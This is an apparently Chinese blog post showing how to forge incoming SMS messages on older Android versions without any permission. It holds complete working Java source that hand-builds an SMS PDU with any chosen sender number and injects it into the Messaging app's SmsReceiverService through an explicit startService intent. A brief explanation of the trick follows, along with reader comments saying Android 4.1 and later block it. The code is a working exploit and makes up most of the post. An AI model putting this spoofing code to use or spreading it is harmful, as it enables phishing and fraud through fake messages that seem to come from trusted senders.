
android 无权限 伪造短信


0x01 这个是大名鼎鼎的蒋教授发现的,原理简单,有点意思

 

0x02 代码实现

package com.smstrick;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.util.Calendar;
import java.util.GregorianCalendar;

import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.PhoneNumberUtils;
import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.EditText;

public class SMSTrickActivity extends Activity implements OnClickListener{
    /**
     * Called when the activity is first created.
     * Inflates {@code R.layout.main} and registers this activity as the click
     * listener of {@code R.id.button1}.
     */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);

        View continue_button = this.findViewById(R.id.button1);

        continue_button.setOnClickListener((OnClickListener) this);
    }
    /**
     * Click handler: reads the sender number from {@code R.id.editText1} and the
     * message text from {@code R.id.editText2} and hands both to
     * {@link #createFakeSms}. Apart from the empty-sender default below, the
     * fields are passed through unvalidated.
     *
     * @param v the clicked view (unused)
     */
    public void onClick(View v) {
    	EditText eNum;
    	EditText eMsg;
    	String sNum;
    	String sMsg;
    	
    	eNum   = (EditText)findViewById(R.id.editText1);
    	eMsg   = (EditText)findViewById(R.id.editText2);
    	
    	sNum = eNum.getText().toString();
    	sMsg = eMsg.getText().toString();
    	

    	
    	//sNum cannot be blank
    	if(sNum.equals("")) sNum = "123456"; // fixed placeholder number when the field is left empty
    	
    	createFakeSms(this.getApplicationContext(),sNum,sMsg);
    	
    }
    
    /**
     * Builds a GSM SMS PDU by hand for {@code sender}/{@code body} and delivers it
     * with {@code startService} to the explicitly named component
     * {@code com.android.mms.transaction.SmsReceiverService}, carrying the
     * {@code android.provider.Telephony.SMS_RECEIVED} action string. Because the
     * Messaging app's service is addressed directly instead of being reached
     * through the system SMS broadcast, the calling app holds no SMS permission
     * and the message still shows up as received from {@code sender}.
     *
     * Defender's note: a component that consumes SMS_RECEIVED data must not trust
     * PDUs arriving via explicit intents or {@code startService}; only the
     * protected system broadcast carries genuine ones. Reader comments below
     * report that this path no longer works from Android 4.1.x on (not verified
     * here).
     *
     * @param context used only to start the service
     * @param sender  digits placed in the PDU originator-address field
     * @param body    message text, packed by the framework's internal GSM 7-bit
     *                encoder reached via reflection; a reader comment below reports
     *                an exception for Chinese text — presumably because the 7-bit
     *                packer only covers the GSM alphabet, unverified
     */
    private static void createFakeSms(Context context, String sender, String body) {
    //Source: http://stackoverflow.com/a/12338541
    //Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app
        byte[] pdu = null;
        // Service-centre (SMSC) address field, filled with a dummy number.
        byte[] scBytes = PhoneNumberUtils
                .networkPortionToCalledPartyBCD("0000000000");
        // Originator address, BCD-encoded like the SMSC address.
        byte[] senderBytes = PhoneNumberUtils
                .networkPortionToCalledPartyBCD(sender);
        int lsmcs = scBytes.length;
        // 7-octet timestamp: year, month, day, hour, minute, second, zone.
        // Each value is cast to a byte and then nibble-swapped by reverseByte;
        // the cast truncates the 4-digit year to its low 8 bits.
        byte[] dateBytes = new byte[7];
        Calendar calendar = new GregorianCalendar();
        dateBytes[0] = reverseByte((byte) (calendar.get(Calendar.YEAR)));
        dateBytes[1] = reverseByte((byte) (calendar.get(Calendar.MONTH) + 1));
        dateBytes[2] = reverseByte((byte) (calendar.get(Calendar.DAY_OF_MONTH)));
        dateBytes[3] = reverseByte((byte) (calendar.get(Calendar.HOUR_OF_DAY)));
        dateBytes[4] = reverseByte((byte) (calendar.get(Calendar.MINUTE)));
        dateBytes[5] = reverseByte((byte) (calendar.get(Calendar.SECOND)));
        // Zone offset (including DST) expressed in quarter-hours.
        dateBytes[6] = reverseByte((byte) ((calendar.get(Calendar.ZONE_OFFSET) + calendar
                .get(Calendar.DST_OFFSET)) / (60 * 1000 * 15)));
        try {
        	Log.d("ice", "test one");
            ByteArrayOutputStream bo = new ByteArrayOutputStream();
            bo.write(lsmcs);            // SMSC address length
            bo.write(scBytes);
            bo.write(0x04);             // PDU first octet (message type / flags)
            bo.write((byte) sender.length()); // originator length as digit count (string length, not byte length)
            bo.write(senderBytes);
            bo.write(0x00);             // protocol identifier
            bo.write(0x00); // encoding: 0 for default 7bit
            bo.write(dateBytes);
            try {
            	
                // GsmAlphabet is an internal framework class, not public SDK API:
                // it is looked up by name and may be absent or renamed on other
                // releases, in which case the catch below swallows the failure.
                String sReflectedClassName = "com.android.internal.telephony.GsmAlphabet";
                Class cReflectedNFCExtras = Class.forName(sReflectedClassName);
                Method stringToGsm7BitPacked = cReflectedNFCExtras.getMethod(
                        "stringToGsm7BitPacked", new Class[] { String.class });
                stringToGsm7BitPacked.setAccessible(true);
                byte[] bodybytes = (byte[]) stringToGsm7BitPacked.invoke(null,
                        body);
                bo.write(bodybytes);
            } catch (Exception e) {
            	// Only logged: the PDU is still emitted below without the body part.
            	e.printStackTrace();
            }

            pdu = bo.toByteArray();
        } catch (IOException e) {
        	// Only logged: pdu stays null and the intent below is still sent.
        	e.printStackTrace();
        }

        // Explicit component + SMS_RECEIVED action delivered through startService.
        // This is the whole trick: the Messaging app's receiver service is fed
        // directly, bypassing the permission-protected system broadcast.
        Intent intent = new Intent();
        intent.setClassName("com.android.mms",
                "com.android.mms.transaction.SmsReceiverService");
        intent.setAction("android.provider.Telephony.SMS_RECEIVED");
        intent.putExtra("pdus", new Object[] { pdu });
        //intent.putExtra("format", "3gpp");
        context.startService(intent);
    }

    /**
     * Swaps the two nibbles of {@code b} (semi-octet order used by the BCD
     * timestamp fields above).
     *
     * @param b input byte
     * @return {@code b} with high and low nibble exchanged
     */
    private static byte reverseByte(byte b) {
        return (byte) ((b & 0xF0) >> 4 | (b & 0x0F) << 4);
    }
}

 

0x03 实质分析 核心在于自定义了系统的

 

        // Excerpt of createFakeSms above: the explicit component name plus the
        // SMS_RECEIVED action, sent via startService, is what lets an app with
        // no SMS permission feed a hand-built PDU to the Messaging app's service.
        Intent intent = new Intent();

        intent.setClassName("com.android.mms",

                "com.android.mms.transaction.SmsReceiverService");

        intent.setAction("android.provider.Telephony.SMS_RECEIVED");

        intent.putExtra("pdus", new Object[] { pdu });

        //intent.putExtra("format", "3gpp");

        context.startService(intent);

 

收到短信的 intent,从而伪造了短信,而且不需要任何权限。

 

 

评论
3 楼 mengfeicheng2012 2014-02-11  
貌似4.1的系统把这个漏洞堵上了
2 楼 pdsljlj 2013-11-21  
android 4.1.2 以上好像是不能用的
1 楼 qian546000 2013-09-21  
icefish大神,
为什么短信的内容如果是中文的话,就会出现异常呢?怎样修改代码,才能支持中文的短信内容呢?
